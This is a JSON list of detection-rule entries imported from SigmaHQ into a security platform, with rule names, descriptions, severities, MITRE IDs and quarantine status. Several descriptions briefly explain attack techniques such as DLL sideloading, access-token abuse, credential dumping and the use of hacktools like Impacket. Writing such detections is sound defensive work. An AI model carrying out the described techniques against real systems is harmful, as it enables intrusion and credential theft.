"source_id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_ad_object_writedac_access.yml" } }, { "id": "sigmahq-sigma-02b18447-ea83-4b1b-8805-714a8a34546a", "type": "detection", "name": "Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution", "description": "Detects execution of Windows Defender \"OfflineScannerShell.exe\" from its non standard directory.\nThe \"OfflineScannerShell.exe\" binary is vulnerable to DLL side loading and will load any DLL named \"mpclient.dll\" from the current working directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-mpclient-dll-sideloading-via-offlinescannershell-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02b18447-ea83-4b1b-8805-714a8a34546a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml" } }, { "id": "sigmahq-sigma-02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", "type": "detection", "name": "Potential COM Objects Download Cradles Usage - Process Creation", "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-com-objects-download-cradles-usage-process-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_download_com_cradles.yml" } }, { "id": "sigmahq-sigma-02c39d30-02b5-45d2-b435-8aebfe5a8629", "type": "detection", "name": "A Member Was Removed From a Security-Enabled Global Group", "description": "Detects activity when a member is removed from a security-enabled global group", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/a-member-was-removed-from-a-security-enabled-global-group.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02c39d30-02b5-45d2-b435-8aebfe5a8629", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml" } }, { "id": "sigmahq-sigma-02cf536a-cf21-4876-8842-4159c8aee3cc", "type": "detection", "name": "Github Push Protection Bypass Detected", "description": "Detects when a user bypasses the push protection on a secret detected by secret scanning.", "version": "1.0.0", "author": 
"AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-push-protection-bypass-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02cf536a-cf21-4876-8842-4159c8aee3cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_push_protection_bypass_detected.yml" } }, { "id": "sigmahq-sigma-02d1d718-dd13-41af-989d-ea85c7fab93f", "type": "detection", "name": "Rare Remote Thread Creation By Uncommon Source Image", "description": "Detects uncommon processes creating remote threads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rare-remote-thread-creation-by-uncommon-source-image.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02d1d718-dd13-41af-989d-ea85c7fab93f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_susp_relevant_source_image.yml" } }, { "id": "sigmahq-sigma-02ee49e2-e294-4d0f-9278-f5b3212fc588", "type": "detection", "name": "New RUN Key Pointing to Suspicious Folder", "description": 
"Detects suspicious new RUN key element pointing to an executable in a suspicious folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-run-key-pointing-to-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml" } }, { "id": "sigmahq-sigma-02f7c9c1-1ae8-4c6a-8add-04693807f92f", "type": "detection", "name": "Potential Access Token Abuse", "description": "Detects potential token impersonation and theft. 
For example, when using \"DuplicateToken(Ex)\" and \"ImpersonateLoggedOnUser\" with the \"LOGON32_LOGON_NEW_CREDENTIALS flag\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-access-token-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_access_token_abuse.yml" } }, { "id": "sigmahq-sigma-0322d9f2-289a-47c2-b5e1-b63c90901a3e", "type": "detection", "name": "Google Cloud Kubernetes RoleBinding", "description": "Detects the creation or patching of potentially malicious RoleBindings. 
This includes both RoleBindings and ClusterRoleBindings.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-kubernetes-rolebinding.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0322d9f2-289a-47c2-b5e1-b63c90901a3e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_kubernetes_rolebinding.yml" } }, { "id": "sigmahq-sigma-0326c3c8-7803-4a0f-8c5c-368f747f7c3e", "type": "detection", "name": "Triple Cross eBPF Rootkit Execve Hijack", "description": "Detects execution of the file \"execve_hijack\", which is used by the Triple Cross rootkit to elevate privileges", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/triple-cross-ebpf-rootkit-execve-hijack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0326c3c8-7803-4a0f-8c5c-368f747f7c3e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml" } }, { "id": "sigmahq-sigma-03409c93-a7c7-49ba-9a4c-a00badf2a153", "type": 
"detection", "name": "Troubleshooting Pack Cmdlet Execution", "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/troubleshooting-pack-cmdlet-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "03409c93-a7c7-49ba-9a4c-a00badf2a153", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml" } }, { "id": "sigmahq-sigma-03552375-cc2c-4883-bbe4-7958d5a980be", "type": "detection", "name": "HackTool - SILENTTRINITY Stager Execution", "description": "Detects SILENTTRINITY stager use via PE metadata", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-silenttrinity-stager-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "03552375-cc2c-4883-bbe4-7958d5a980be", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_hktl_silenttrinity_stager.yml" } }, { "id": "sigmahq-sigma-0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", "type": "detection", "name": "Disable Privacy Settings Experience in Registry", "description": "Detects registry modifications that disable Privacy Settings Experience", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-privacy-settings-experience-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_privacy_settings_experience.yml" } }, { "id": "sigmahq-sigma-037dcd71-33a8-4392-bb01-293c94663e5a", "type": "detection", "name": "File Decryption Using Gpg4win", "description": "Detects usage of Gpg4win to decrypt files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-decryption-using-gpg4win.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "037dcd71-33a8-4392-bb01-293c94663e5a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gpg4win_decryption.yml" } }, { "id": "sigmahq-sigma-039a7469-0296-4450-84c0-f6966b16dc6d", "type": "detection", "name": "PIM Approvals And Deny Elevation", "description": "Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pim-approvals-and-deny-elevation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "039a7469-0296-4450-84c0-f6966b16dc6d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_pim_activation_approve_deny.yml" } }, { "id": "sigmahq-sigma-03cc0c25-389f-4bf8-b48d-11878079f1ca", "type": "detection", "name": "Suspicious MSHTA Child Process", "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-mshta-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mshta_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-03d83090-8cba-44a0-b02f-0b756a050306", "type": "detection", "name": "Potential WinAPI Calls Via PowerShell Scripts", "description": "Detects use of WinAPI functions in PowerShell scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1106" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-winapi-calls-via-powershell-scripts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "03d83090-8cba-44a0-b02f-0b756a050306", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_win_api_susp_access.yml" } }, { "id": "sigmahq-sigma-03f4ca17-de95-428d-a75a-4ee78b047256", "type": "detection", "name": "HackTool - Impacket File Indicators", "description": "Detects file creation events with filename patterns used by Impacket.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-impacket-file-indicators.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "03f4ca17-de95-428d-a75a-4ee78b047256", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_impacket_file_indicators.yml" } }, { "id": "sigmahq-sigma-0403d67d-6227-4ea8-8145-4e72db7da120", "type": "detection", "name": "UtilityFunctions.ps1 Proxy Dll", "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/utilityfunctions-ps1-proxy-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0403d67d-6227-4ea8-8145-4e72db7da120", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml" } }, { "id": "sigmahq-sigma-043c4b8b-3a54-4780-9682-081cb6b8185c", "type": "detection", "name": "Suspicious IIS Module Registration", "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/suspicious-iis-module-registration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "043c4b8b-3a54-4780-9682-081cb6b8185c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_iis_susp_module_registration.yml" } }, { "id": "sigmahq-sigma-0442defa-b4a2-41c9-ae2c-ea7042fc4701", "type": "detection", "name": "Potential Credential Dumping Attempt Using New NetworkProvider - REG", "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-credential-dumping-attempt-using-new-networkprovider-reg.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_new_network_provider.yml" } }, { "id": "sigmahq-sigma-044ba588-dff4-4918-9808-3f95e8160606", "type": "detection", "name": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", "version": 
"1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/copy-dmp-dump-files-from-remote-share-via-cmd-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "044ba588-dff4-4918-9808-3f95e8160606", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml" } }, { "id": "sigmahq-sigma-046218bd-e0d8-4113-a3c3-895a12b2b298", "type": "detection", "name": "Session Manager Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001", "T1546.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/session-manager-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "046218bd-e0d8-4113-a3c3-895a12b2b298", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml" } }, { "id": "sigmahq-sigma-04936b66-3915-43ad-a8e5-809eadfd1141", "type": "detection", "name": "Insensitive 
Subfolder Search Via Findstr.EXE", "description": "Detects execution of findstr with the \"s\" and \"i\" flags for a \"subfolder\" and \"insensitive\" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1564.004", "T1552.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/insensitive-subfolder-search-via-findstr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "04936b66-3915-43ad-a8e5-809eadfd1141", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_findstr_subfolder_search.yml" } }, { "id": "sigmahq-sigma-04ad83ef-1a37-4c10-b57a-81092164bf33", "type": "detection", "name": "Github Repository/Organization Transferred", "description": "Detects when a repository or an organization is being transferred to another location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1020", "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-repository-organization-transferred.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "04ad83ef-1a37-4c10-b57a-81092164bf33", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_repo_or_org_transferred.yml" } }, { "id": "sigmahq-sigma-04b45a8a-d11d-49e4-9acc-4a1b524407a5", "type": "detection", "name": "DNS-over-HTTPS Enabled by Registry", "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1140", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-over-https-enabled-by-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" } }, { "id": "sigmahq-sigma-04b60639-39c0-412a-9fbe-e82499c881a3", "type": "detection", "name": "Windows Defender Firewall Has Been Reset To Its Default Configuration", "description": "Detects activity when Windows Defender Firewall has been reset to its default configuration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": 
"sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-firewall-has-been-reset-to-its-default-configuration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "04b60639-39c0-412a-9fbe-e82499c881a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/firewall_as/win_firewall_as_reset_config.yml" } }, { "id": "sigmahq-sigma-04e2a23a-9b29-4a5c-be3a-3542e3f982ba", "type": "detection", "name": "Google Workspace Granted Domain API Access", "description": "Detects when an API access service account is granted domain authority.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-workspace-granted-domain-api-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "04e2a23a-9b29-4a5c-be3a-3542e3f982ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/admin/gcp_gworkspace_granted_domain_api_access.yml" } }, { "id": "sigmahq-sigma-05296024-fe8a-4baf-8f3d-9a5f5624ceb2", "type": "detection", "name": "Malicious Driver Load", "description": "Detects loading of known malicious drivers via their hash.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": 
[ "T1543.003", "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-driver-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "05296024-fe8a-4baf-8f3d-9a5f5624ceb2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_mal_drivers.yml" } }, { "id": "sigmahq-sigma-0531e43a-d77d-47c2-b89f-5fe50321c805", "type": "detection", "name": "RegAsm.EXE Initiating Network Connection To Public IP", "description": "Detects \"RegAsm.exe\" initiating a network connection to public IP addresses", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/regasm-exe-initiating-network-connection-to-public-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0531e43a-d77d-47c2-b89f-5fe50321c805", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_regasm_network_activity.yml" } }, { "id": "sigmahq-sigma-055fb148-60f8-462d-ad16-26926ce050f1", "type": "detection", "name": "AWS User Login Profile Was Modified", "description": "Detects activity where someone changes the console password of another user.\nAn attacker with the 
\"iam:UpdateLoginProfile\" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-user-login-profile-was-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "055fb148-60f8-462d-ad16-26926ce050f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_update_login_profile.yml" } }, { "id": "sigmahq-sigma-055fb54c-a8f4-4aee-bd44-f74cf30a0d9d", "type": "detection", "name": "HackTool - SharpMove Tool Execution", "description": "Detects the execution of SharpMove, a .NET utility performing multiple tasks such as \"Task Creation\", \"SCM\" query, VBScript execution using WMI via its PE metadata and command line options.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpmove-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 